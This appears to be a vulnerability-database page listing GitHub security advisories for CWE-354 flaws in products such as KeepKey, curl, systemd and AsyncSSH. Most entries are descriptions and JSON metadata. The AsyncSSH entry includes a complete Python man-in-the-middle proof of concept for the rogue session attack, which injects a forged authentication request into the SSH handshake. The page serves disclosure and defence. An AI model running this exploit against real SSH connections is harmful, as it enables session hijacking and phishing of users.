Common Weakness Enumeration

CWE-354

Allowed

Improper Validation of Integrity Check Value

Abstraction: Base · Status: Draft

The product does not validate or incorrectly validates the integrity check values or "checksums" of a message. This may prevent it from detecting if the data has been modified or corrupted in transmission.

231 vulnerabilities reference this CWE, most recent first.

GHSA-8J67-XCFP-JFCP

Vulnerability from github – Published: 2022-05-24 17:02 – Updated: 2024-04-04 02:42
VLAI
Details

Insufficient checks in the finite state machine of the ShapeShift KeepKey hardware wallet before firmware 6.2.2 allow a partial reset of cryptographic secrets to known values via crafted messages. Notably, this breaks the security of U2F for new server registrations and invalidates existing registrations. This vulnerability can be exploited by unauthenticated attackers and the interface is reachable via WebUSB.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-18672"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-354"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-12-06T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "Insufficient checks in the finite state machine of the ShapeShift KeepKey hardware wallet before firmware 6.2.2 allow a partial reset of cryptographic secrets to known values via crafted messages. Notably, this breaks the security of U2F for new server registrations and invalidates existing registrations. This vulnerability can be exploited by unauthenticated attackers and the interface is reachable via WebUSB.",
  "id": "GHSA-8j67-xcfp-jfcp",
  "modified": "2024-04-04T02:42:10Z",
  "published": "2022-05-24T17:02:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-18672"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keepkey/keepkey-firmware/commit/769714fcb569e7a4faff9530a2d9ac1f9d6e5680"
    },
    {
      "type": "WEB",
      "url": "https://blog.inhq.net/posts/keepkey-CVE-2019-18672"
    },
    {
      "type": "WEB",
      "url": "https://medium.com/shapeshift-stories/keepkey-release-notes-v-6f7d2ec78065"
    },
    {
      "type": "WEB",
      "url": "https://medium.com/shapeshift-stories/shapeshift-security-update-8ec89bb1b4e3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-8JWM-Q5XV-G48G

Vulnerability from github – Published: 2025-06-24 12:30 – Updated: 2025-06-26 21:31
VLAI
Details

A vulnerability exists in the IEC 61850 of the MicroSCADA X SYS600 product. An IEC 61850-8 crafted message content from IED or remote system can cause a denial of service resulting in disconnection loop.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-39203"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-354"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-06-24T12:15:21Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability exists in the IEC 61850 of the MicroSCADA X SYS600 product. An IEC 61850-8 crafted message content from IED or remote system can cause a denial of service resulting in disconnection loop.",
  "id": "GHSA-8jwm-q5xv-g48g",
  "modified": "2025-06-26T21:31:05Z",
  "published": "2025-06-24T12:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-39203"
    },
    {
      "type": "WEB",
      "url": "https://publisher.hitachienergy.com/preview?DocumentID=8DBD000218\u0026LanguageCode=en\u0026DocumentPartId=\u0026Action=Launch"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-8VJ5-XMHG-P7F6

Vulnerability from github – Published: 2022-05-24 19:01 – Updated: 2022-05-24 19:01
VLAI
Details

Proofpoint Enterprise Protection (PPS/PoD) before 8.17.0 contains a vulnerability that could allow an attacker to deliver an email message with a malicious attachment that bypasses scanning and file-blocking rules. The vulnerability exists because messages with certain crafted and malformed multipart structures are not properly handled.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-14009"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-354"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-05-07T12:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Proofpoint Enterprise Protection (PPS/PoD) before 8.17.0 contains a vulnerability that could allow an attacker to deliver an email message with a malicious attachment that bypasses scanning and file-blocking rules. The vulnerability exists because messages with certain crafted and malformed multipart structures are not properly handled.",
  "id": "GHSA-8vj5-xmhg-p7f6",
  "modified": "2022-05-24T19:01:47Z",
  "published": "2022-05-24T19:01:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14009"
    },
    {
      "type": "WEB",
      "url": "https://www.proofpoint.com/us/security/security-advisories"
    },
    {
      "type": "WEB",
      "url": "https://www.proofpoint.com/us/security/security-advisories/pfpt-sa-2021-0006"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-949W-8PPH-6GMH

Vulnerability from github – Published: 2022-05-24 19:05 – Updated: 2022-05-24 19:05
VLAI
Details

Improper caller check vulnerability in Knox Core prior to SMR MAY-2021 Release 1 allows attackers to install arbitrary app.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-25388"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-354"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-06-11T15:15:00Z",
    "severity": "HIGH"
  },
  "details": "Improper caller check vulnerability in Knox Core prior to SMR MAY-2021 Release 1 allows attackers to install arbitrary app.",
  "id": "GHSA-949w-8pph-6gmh",
  "modified": "2022-05-24T19:05:10Z",
  "published": "2022-05-24T19:05:10Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25388"
    },
    {
      "type": "WEB",
      "url": "https://blog.oversecured.com/Two-weeks-of-securing-Samsung-devices-Part-1"
    },
    {
      "type": "WEB",
      "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2021\u0026month=5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-975F-FVHV-8MHX

Vulnerability from github – Published: 2022-05-24 19:10 – Updated: 2024-03-27 15:30
VLAI
Details

When curl is instructed to download content using the metalink feature, thecontents is verified against a hash provided in the metalink XML file.The metalink XML file points out to the client how to get the same contentfrom a set of different URLs, potentially hosted by different servers and theclient can then download the file from one or several of them. In a serial orparallel manner.If one of the servers hosting the contents has been breached and the contentsof the specific file on that server is replaced with a modified payload, curlshould detect this when the hash of the file mismatches after a completeddownload. It should remove the contents and instead try getting the contentsfrom another URL. This is not done, and instead such a hash mismatch is onlymentioned in text and the potentially malicious content is kept in the file ondisk.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-22922"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-354",
      "CWE-755"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-08-05T21:15:00Z",
    "severity": "HIGH"
  },
  "details": "When curl is instructed to download content using the metalink feature, thecontents is verified against a hash provided in the metalink XML file.The metalink XML file points out to the client how to get the same contentfrom a set of different URLs, potentially hosted by different servers and theclient can then download the file from one or several of them. In a serial orparallel manner.If one of the servers hosting the contents has been breached and the contentsof the specific file on that server is replaced with a modified payload, curlshould detect this when the hash of the file mismatches after a completeddownload. It should remove the contents and instead try getting the contentsfrom another URL. This is not done, and instead such a hash mismatch is onlymentioned in text and the potentially malicious content is kept in the file ondisk.",
  "id": "GHSA-975f-fvhv-8mhx",
  "modified": "2024-03-27T15:30:33Z",
  "published": "2022-05-24T19:10:06Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22922"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/1213175"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc%40%3Cdev.kafka.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc%40%3Cusers.kafka.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cdev.kafka.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cusers.kafka.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7%40%3Cdev.kafka.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7%40%3Cusers.kafka.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cdev.kafka.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cusers.kafka.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FRUCW2UVNYUDZF72DQLFQR4PJEC6CF7V"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRUCW2UVNYUDZF72DQLFQR4PJEC6CF7V"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202212-01"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20210902-0003"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9C5H-6X6R-HVXH

Vulnerability from github – Published: 2024-05-02 15:30 – Updated: 2026-02-17 21:31
VLAI
Details

An Improper Validation of Integrity Check Value vulnerability in Zscaler Client Connector on MacOS allows a denial of service of the Client Connector binary and thus removing client functionality.This issue affects Client Connector on MacOS: before 3.4.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-23462"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-354"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-02T13:23:06Z",
    "severity": "LOW"
  },
  "details": "An Improper Validation of Integrity Check Value vulnerability in Zscaler Client Connector on MacOS allows a denial of service of the Client Connector binary and thus removing client functionality.This issue affects Client Connector on MacOS: before 3.4.",
  "id": "GHSA-9c5h-6x6r-hvxh",
  "modified": "2026-02-17T21:31:12Z",
  "published": "2024-05-02T15:30:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23462"
    },
    {
      "type": "WEB",
      "url": "https://help.zscaler.com/zscaler-client-connector/client-connector-app-release-summary-2021?applicable_category=macos\u0026applicable_version=3.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9MV8-4V9G-HM48

Vulnerability from github – Published: 2023-06-13 18:30 – Updated: 2024-03-21 03:35
VLAI
Details

An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-31437"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-354"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-13T17:15:14Z",
    "severity": "MODERATE"
  },
  "details": "An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed.",
  "id": "GHSA-9mv8-4v9g-hm48",
  "modified": "2024-03-21T03:35:24Z",
  "published": "2023-06-13T18:30:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31437"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kastel-security/Journald"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf"
    },
    {
      "type": "WEB",
      "url": "https://github.com/systemd/systemd/releases"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9R9C-RXHR-5HCG

Vulnerability from github – Published: 2026-06-16 15:33 – Updated: 2026-06-16 15:33
VLAI
Details

A security issue exists within 1769 CompactLogix controllers due to the missing validation of sequence numbers and source IP addresses in the CIP protocol. This allows attacker to abuse the exposed Connection ID’s visible on the web interface to perform denial-of-service attacks, resulting in a minor fault.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-11694"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-354"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-16T15:16:32Z",
    "severity": "HIGH"
  },
  "details": "A security issue exists within\u00a01769 CompactLogix controllers\u00a0due to the\u00a0missing validation of sequence numbers and source IP addresses in the CIP protocol. This allows attacker to abuse the exposed Connection ID\u2019s visible on the web interface to perform denial-of-service attacks, resulting in a\u00a0minor fault.",
  "id": "GHSA-9r9c-rxhr-5hcg",
  "modified": "2026-06-16T15:33:50Z",
  "published": "2026-06-16T15:33:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11694"
    },
    {
      "type": "WEB",
      "url": "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1776.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-9VJX-8M86-3RHW

Vulnerability from github – Published: 2025-07-07 00:30 – Updated: 2025-07-07 18:32
VLAI
Details

A vulnerability classified as critical was found in Comodo Internet Security Premium 12.3.4.8162. This vulnerability affects unknown code of the file cis_update_x64.xml of the component Manifest File Handler. The manipulation leads to improper validation of integrity check value. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-7096"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-345",
      "CWE-354"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-06T22:15:25Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability classified as critical was found in Comodo Internet Security Premium 12.3.4.8162. This vulnerability affects unknown code of the file cis_update_x64.xml of the component Manifest File Handler. The manipulation leads to improper validation of integrity check value. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-9vjx-8m86-3rhw",
  "modified": "2025-07-07T18:32:24Z",
  "published": "2025-07-07T00:30:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7096"
    },
    {
      "type": "WEB",
      "url": "https://drive.google.com/file/d/1qnWarYsTSc5_sV6o8ULv0LBvGfKKXPxn/view"
    },
    {
      "type": "WEB",
      "url": "https://drive.google.com/file/d/1qnWarYsTSc5_sV6o8ULv0LBvGfKKXPxn/view?usp=sharing"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.315010"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.315010"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.603713"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-C35Q-FFPF-5QPM

Vulnerability from github – Published: 2023-11-09 18:35 – Updated: 2025-11-04 16:47
VLAI
Summary
AsyncSSH Rogue Session Attack
Details

Summary

An issue in AsyncSSH v2.14.0 and earlier allows attackers to control the remote end of an SSH client session via packet injection/removal and shell emulation.

Details

The rogue session attack targets any SSH client connecting to an AsyncSSH server, on which the attacker must have a shell account. The goal of the attack is to log the client into the attacker's account without the client being able to detect this. At that point, due to how SSH sessions interact with shell environments, the attacker has complete control over the remote end of the SSH session. The attacker receives all keyboard input by the user, completely controls the terminal output of the user's session, can send and receive data to/from forwarded network ports, and is able to create signatures with a forwarded SSH Agent, if any. The result is a complete break of the confidentiality and integrity of the secure channel, providing a strong vector for a targeted phishing campaign against the user. For example, the attacker can display a password prompt and wait for the user to enter the password, elevating the attacker's position to a MitM at the application layer and enabling perfect shell emulation.

The attacks work by the attacker injecting a chosen authentication request before the client's NewKeys. The authentication request sent by the attacker must be a valid authentication request containing his credentials. The attacker can use any authentication mechanism that does not require exchanging additional messages between client and server, such as password or publickey. Due to a state machine flaw, the AsyncSSH server accepts the unauthenticated user authentication request message and defers it until the client has requested the authentication protocol.

PoC

AsyncSSH 2.14.0 client (simple_client.py example) connecting to AsyncSSH 2.14.0 server (simple_server.py example) ```python #!/usr/bin/python3 import socket from threading import Thread from binascii import unhexlify from time import sleep ################################################################################## ## Proof of Concept for the rogue session attack (ChaCha20-Poly1305) ## ## ## ## Variant: Unmodified variant (EXT_INFO by client required) ## ## ## ## Client(s) tested: AsyncSSH 2.14.0 (simple_client.py example) ## ## Server(s) tested: AsyncSSH 2.14.0 (simple_server.py example) ## ## ## ## Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 ## ################################################################################## # IP and port for the TCP proxy to bind to PROXY_IP = '127.0.0.1' PROXY_PORT = 2222 # IP and port of the server SERVER_IP = '127.0.0.1' SERVER_PORT = 22 # Length of the individual messages NEW_KEYS_LENGTH = 16 CLIENT_EXT_INFO_LENGTH = 60 # Additional data sent by the client after NEW_KEYS (excluding EXT_INFO) ADDITIONAL_CLIENT_DATA_LENGTH = 60 newkeys_payload = b'\x00\x00\x00\x0c\x0a\x15' def contains_newkeys(data): return newkeys_payload in data rogue_userauth_request = unhexlify('000000440b320000000861747461636b65720000000e7373682d636f6e6e656374696f6e0000000870617373776f7264000000000861747461636b65720000000000000000000000') def insert_rogue_authentication_request(data): newkeys_index = data.index(newkeys_payload) # Insert rogue authentication request and remove SSH_MSG_EXT_INFO return data[:newkeys_index] + rogue_userauth_request + data[newkeys_index:newkeys_index + NEW_KEYS_LENGTH] + data[newkeys_index + NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH:] def forward_client_to_server(client_socket, server_socket): delay_next = False try: while True: client_data = client_socket.recv(4096) if delay_next: delay_next = False sleep(0.25) if contains_newkeys(client_data): print("[+] SSH_MSG_NEWKEYS sent by client identified!") if len(client_data) < NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH + ADDITIONAL_CLIENT_DATA_LENGTH: print("[+] client_data does not contain all messages sent by the client yet. Receiving additional bytes until we have 156 bytes buffered!") while len(client_data) < NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH + ADDITIONAL_CLIENT_DATA_LENGTH: client_data += client_socket.recv(4096) print(f"[d] Original client_data before modification: {client_data.hex()}") client_data = insert_rogue_authentication_request(client_data) print(f"[d] Modified client_data with rogue authentication request: {client_data.hex()}") delay_next = True if len(client_data) == 0: break server_socket.send(client_data) except ConnectionResetError: print("[!] Client connection has been reset. Continue closing sockets.") print("[!] forward_client_to_server thread ran out of data, closing sockets!") client_socket.close() server_socket.close() def forward_server_to_client(client_socket, server_socket): try: while True: server_data = server_socket.recv(4096) if len(server_data) == 0: break client_socket.send(server_data) except ConnectionResetError: print("[!] Target connection has been reset. Continue closing sockets.") print("[!] forward_server_to_client thread ran out of data, closing sockets!") client_socket.close() server_socket.close() if __name__ == '__main__': print("--- Proof of Concept for the rogue session attack (ChaCha20-Poly1305) ---") mitm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) mitm_socket.bind((PROXY_IP, PROXY_PORT)) mitm_socket.listen(5) print(f"[+] MitM Proxy started. Listening on {(PROXY_IP, PROXY_PORT)} for incoming connections...") try: while True: client_socket, client_addr = mitm_socket.accept() print(f"[+] Accepted connection from: {client_addr}") print(f"[+] Establishing new server connection to {(SERVER_IP, SERVER_PORT)}.") server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.connect((SERVER_IP, SERVER_PORT)) print("[+] Spawning new forwarding threads to handle client connection.") Thread(target=forward_client_to_server, args=(client_socket, server_socket)).start() Thread(target=forward_server_to_client, args=(client_socket, server_socket)).start() except KeyboardInterrupt: client_socket.close() server_socket.close() mitm_socket.close() ```

Impact

The impact heavily depends on the application logic implemented by the AsyncSSH server. In the worst case, the AsyncSSH server starts a shell for the authenticated user upon connection, switching the user to the authenticated one. In this case, the attacker can prepare a modified shell beforehand to perform perfect phishing attacks and become a MitM at the application layer. When the username of the authenticated user is not used beyond authentication, this vulnerability does not impact the connection's security.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "asyncssh"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.14.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-46446"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-345",
      "CWE-349",
      "CWE-354",
      "CWE-359",
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-11-09T18:35:14Z",
    "nvd_published_at": "2023-11-14T03:15:09Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nAn issue in AsyncSSH v2.14.0 and earlier allows attackers to control the remote end of an SSH client session via packet injection/removal and shell emulation.\n\n### Details\n\nThe rogue session attack targets any SSH client connecting to an AsyncSSH server, on which the attacker must have a shell account. The goal of the attack is to log the client into the attacker\u0027s account without the client being able to detect this. At that point, due to how SSH sessions interact with shell environments, the attacker has complete control over the remote end of the SSH session. The attacker receives all keyboard input by the user, completely controls the terminal output of the user\u0027s session, can send and receive data to/from forwarded network ports, and is able to create signatures with a forwarded SSH Agent, if any. The result is a complete break of the confidentiality and integrity of the secure channel, providing a strong vector for a targeted phishing campaign against the user. For example, the attacker can display a password prompt and wait for the user to enter the password, elevating the attacker\u0027s position to a MitM at the application layer and enabling perfect shell emulation.\n\nThe attacks work by the attacker injecting a chosen authentication request before the client\u0027s NewKeys. The authentication request sent by the attacker must be a valid authentication request containing his credentials. The attacker can use any authentication mechanism that does not require exchanging additional messages between client and server, such as password or publickey. Due to a state machine flaw, the AsyncSSH server accepts the unauthenticated user authentication request message and defers it until the client has requested the authentication protocol.\n\n### PoC\n\n\u003cdetails\u003e\n  \u003csummary\u003eAsyncSSH 2.14.0 client (simple_client.py example) connecting to AsyncSSH 2.14.0 server (simple_server.py example)\u003c/summary\u003e\n\n  ```python\n  #!/usr/bin/python3\n  import socket\n  from threading import Thread\n  from binascii import unhexlify\n  from time import sleep\n  \n  ##################################################################################\n  ## Proof of Concept for the rogue session attack (ChaCha20-Poly1305)            ##\n  ##                                                                              ##\n  ## Variant: Unmodified variant (EXT_INFO by client required)                    ##\n  ##                                                                              ##\n  ## Client(s) tested: AsyncSSH 2.14.0 (simple_client.py example)                 ##\n  ## Server(s) tested: AsyncSSH 2.14.0 (simple_server.py example)                 ##\n  ##                                                                              ##\n  ## Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 ##\n  ##################################################################################\n  \n  # IP and port for the TCP proxy to bind to\n  PROXY_IP = \u0027127.0.0.1\u0027\n  PROXY_PORT = 2222\n  \n  # IP and port of the server\n  SERVER_IP = \u0027127.0.0.1\u0027\n  SERVER_PORT = 22\n  \n  # Length of the individual messages\n  NEW_KEYS_LENGTH = 16\n  CLIENT_EXT_INFO_LENGTH = 60\n  # Additional data sent by the client after NEW_KEYS (excluding EXT_INFO)\n  ADDITIONAL_CLIENT_DATA_LENGTH = 60\n  \n  newkeys_payload = b\u0027\\x00\\x00\\x00\\x0c\\x0a\\x15\u0027\n  def contains_newkeys(data):\n      return newkeys_payload in data\n  \n  rogue_userauth_request = unhexlify(\u0027000000440b320000000861747461636b65720000000e7373682d636f6e6e656374696f6e0000000870617373776f7264000000000861747461636b65720000000000000000000000\u0027)\n  def insert_rogue_authentication_request(data):\n      newkeys_index = data.index(newkeys_payload)\n      # Insert rogue authentication request and remove SSH_MSG_EXT_INFO\n      return data[:newkeys_index] + rogue_userauth_request + data[newkeys_index:newkeys_index + NEW_KEYS_LENGTH] + data[newkeys_index + NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH:]\n  \n  def forward_client_to_server(client_socket, server_socket):\n      delay_next = False\n      try:\n          while True:\n              client_data = client_socket.recv(4096)\n              if delay_next:\n                  delay_next = False\n                  sleep(0.25)\n              if contains_newkeys(client_data):\n                  print(\"[+] SSH_MSG_NEWKEYS sent by client identified!\")\n                  if len(client_data) \u003c NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH + ADDITIONAL_CLIENT_DATA_LENGTH:\n                      print(\"[+] client_data does not contain all messages sent by the client yet. Receiving additional bytes until we have 156 bytes buffered!\")\n                  while len(client_data) \u003c NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH + ADDITIONAL_CLIENT_DATA_LENGTH:\n                      client_data += client_socket.recv(4096)\n                  print(f\"[d] Original client_data before modification: {client_data.hex()}\")\n                  client_data = insert_rogue_authentication_request(client_data)\n                  print(f\"[d] Modified client_data with rogue authentication request: {client_data.hex()}\")\n                  delay_next = True\n              if len(client_data) == 0:\n                  break\n              server_socket.send(client_data)\n      except ConnectionResetError:\n          print(\"[!] Client connection has been reset. Continue closing sockets.\")\n      print(\"[!] forward_client_to_server thread ran out of data, closing sockets!\")\n      client_socket.close()\n      server_socket.close()\n  \n  def forward_server_to_client(client_socket, server_socket):\n      try:\n          while True:\n              server_data = server_socket.recv(4096)\n              if len(server_data) == 0:\n                  break\n              client_socket.send(server_data)\n      except ConnectionResetError:\n          print(\"[!] Target connection has been reset. Continue closing sockets.\")\n      print(\"[!] forward_server_to_client thread ran out of data, closing sockets!\")\n      client_socket.close()\n      server_socket.close()\n  \n  if __name__ == \u0027__main__\u0027:\n      print(\"--- Proof of Concept for the rogue session attack (ChaCha20-Poly1305) ---\")\n      mitm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n      mitm_socket.bind((PROXY_IP, PROXY_PORT))\n      mitm_socket.listen(5)\n  \n      print(f\"[+] MitM Proxy started. Listening on {(PROXY_IP, PROXY_PORT)} for incoming connections...\")\n  \n      try:\n          while True:\n              client_socket, client_addr = mitm_socket.accept()\n              print(f\"[+] Accepted connection from: {client_addr}\")\n              print(f\"[+] Establishing new server connection to {(SERVER_IP, SERVER_PORT)}.\")\n              server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n              server_socket.connect((SERVER_IP, SERVER_PORT))\n              print(\"[+] Spawning new forwarding threads to handle client connection.\")\n              Thread(target=forward_client_to_server, args=(client_socket, server_socket)).start()\n              Thread(target=forward_server_to_client, args=(client_socket, server_socket)).start()\n      except KeyboardInterrupt:\n          client_socket.close()\n          server_socket.close()\n          mitm_socket.close()\n  ```\n\u003c/details\u003e\n\n### Impact\n\nThe impact heavily depends on the application logic implemented by the AsyncSSH server. In the worst case, the AsyncSSH server starts a shell for the authenticated user upon connection, switching the user to the authenticated one. In this case, the attacker can prepare a modified shell beforehand to perform perfect phishing attacks and become a MitM at the application layer. When the username of the authenticated user is not used beyond authentication, this vulnerability does not impact the connection\u0027s security.",
  "id": "GHSA-c35q-ffpf-5qpm",
  "modified": "2025-11-04T16:47:15Z",
  "published": "2023-11-09T18:35:14Z",
  "references": [
    {
      "type": "WEB",
